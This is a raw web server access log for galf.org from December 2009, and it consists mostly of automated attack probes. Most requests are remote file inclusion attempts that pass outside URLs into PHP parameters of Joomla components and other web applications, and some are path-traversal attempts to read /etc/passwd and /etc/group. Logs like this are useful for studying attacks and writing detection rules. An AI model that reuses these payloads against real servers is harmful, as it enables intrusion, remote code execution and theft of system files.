91.121.75.82 - - [20/Dec/2009:16:00:04 -0800] "GET /logs/access_090831.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:00:46 -0800] "GET /logs/access_091102.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:16:00:48 -0800] "GET /logs/access_090921.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:16:00:48 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.47.7.71 - - [20/Dec/2009:16:00:48 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.bangkokcrystal.com/_admin/uploadfiles/files/pro/CMD.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:01:27 -0800] "GET /logs/access_090921.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:01:39 -0800] "GET /logs/access_090622.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [20/Dec/2009:16:01:47 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:02:36 -0800] "GET /logs/access_090706.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:02:38 -0800] "GET /logs/access_090622.log%20%20/send_reminders.php?includedir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:02:59 -0800] "GET /logs/access_090608.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:02:59 -0800] "GET /logs/access_090525.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:03:16 -0800] "GET /logs/access_090914.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
90.182.36.30 - - [20/Dec/2009:16:03:27 -0800] "GET /logs/access_090622.log%20%20/send_reminders.php?includedir=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:16:03:59 -0800] "GET /index.php?meio.php=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
200.219.195.66 - - [20/Dec/2009:16:04:01 -0800] "GET /index.php?meio.php=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
200.219.195.66 - - [20/Dec/2009:16:04:57 -0800] "GET /index.php?configFile=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "galf.org"
200.219.195.66 - - [20/Dec/2009:16:05:00 -0800] "GET /index.php?configFile=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "galf.org"
66.102.237.81 - - [20/Dec/2009:16:05:36 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:05:36 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:05:36 -0800] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:16:05:43 -0800] "GET /logs/access_090720.log%20/index.php?meio.php=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:05:45 -0800] "GET /logs/access_090921.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.219.195.66 - - [20/Dec/2009:16:05:49 -0800] "GET /logs/access_090720.log%20/index.php?meio.php=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:06 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:06 -0800] "GET /logs/access_091123.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:06 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:06:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:06:08 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.102.237.81 - - [20/Dec/2009:16:06:08 -0800] "GET /logs/access_090921.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://40-crew.com/includes/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:25 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:25 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:25 -0800] "GET /logs/access_091123.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:06:32 -0800] "GET /logs/access_090706.log//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:06:52 -0800] "GET /logs/access_090824.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:02 -0800] "GET /logs/access_091026.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:02 -0800] "GET /logs/access_090720.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:02 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:02 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:02 -0800] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:07 -0800] "GET /logs/access_090907.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:07 -0800] "GET /logs/access_091005.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:07 -0800] "GET /logs/access_091116.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:07 -0800] "GET /logs/access_090803.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:07 -0800] "GET /logs/access_090831.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:09 -0800] "GET /logs/access_090824.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:16 -0800] "GET /logs/access_091019.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:16 -0800] "GET /logs/access_090525.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:16 -0800] "GET /logs/access_090921.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:16 -0800] "GET /logs/access_090928.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:18 -0800] "GET /logs///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:18 -0800] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:18 -0800] "GET /logs/access.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:18 -0800] "GET /logs/access_091026.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:18 -0800] "GET /logs/access_090720.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:07:19 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:20 -0800] "GET /logs/access_090817.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:20 -0800] "GET /logs/access_090706.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:23 -0800] "GET /logs/access_090907.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:23 -0800] "GET /logs/access_091116.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:23 -0800] "GET /logs/access_091005.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:23 -0800] "GET /logs/access_090803.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:23 -0800] "GET /logs/access_090831.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:32 -0800] "GET /logs/access_091019.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:32 -0800] "GET /logs/access_090525.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:32 -0800] "GET /logs/access_090928.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:32 -0800] "GET /logs/access_090921.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:36 -0800] "GET /logs/access_090817.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:36 -0800] "GET /logs/access_090706.log%20%20///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.75.82 - - [20/Dec/2009:16:07:47 -0800] "GET /logs/access_091130.log//components/com_simpleboard/image_upload.php?sbp=http://www.st-catherine.ru/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:56 -0800] "GET /logs/access_091102.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:07:56 -0800] "GET /logs/access_090525.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:08:11 -0800] "GET /logs/access_091102.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.168.117 - - [20/Dec/2009:16:08:11 -0800] "GET /logs/access_090525.log///technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kim-key.cn//bbs//latest_skin/nzeo/main_notice/images/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.32 - - [20/Dec/2009:16:08:42 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {966FEF99-B3DE-30E6-3690-481CB73F6F06})" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:16:09:15 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 200 4942 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
203.197.196.10 - - [20/Dec/2009:16:09:15 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.brockbrown.com/gc/autoo?? HTTP/1.1" 200 1048 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:42 -0800] "GET /skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:42 -0800] "GET /logs//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:42 -0800] "GET /logs/access_090713.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:56 -0800] "GET /logs//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:56 -0800] "GET /skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:12:56 -0800] "GET /logs/access_090713.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:03 -0800] "GET /logs/access_090713.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:03 -0800] "GET /skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:03 -0800] "GET /logs//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:13 -0800] "GET /logs/access_090817.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:25 -0800] "GET /logs/access_090817.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.1.32 - - [20/Dec/2009:16:13:33 -0800] "GET /logs/access_090817.log%20%20//skin/gallery/login.php?dir=http://sapsaree.org/bbs/icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:28:28 -0800] "GET /home.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.97.212.123 - - [20/Dec/2009:16:28:28 -0800] "GET /home.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:28:35 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:28:35 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:28:35 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.225.106.11 - - [20/Dec/2009:16:28:51 -0800] "GET //veiw.php?pg=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "galf.org"
195.225.106.11 - - [20/Dec/2009:16:29:36 -0800] "GET /!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:29:40 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:29:40 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:29:40 -0800] "GET /logs/access_090824.log%20%20//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [20/Dec/2009:16:29:55 -0800] "GET /logs/access_090907.log%20%20//admin/business_inc/saveserver.php?thisdir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
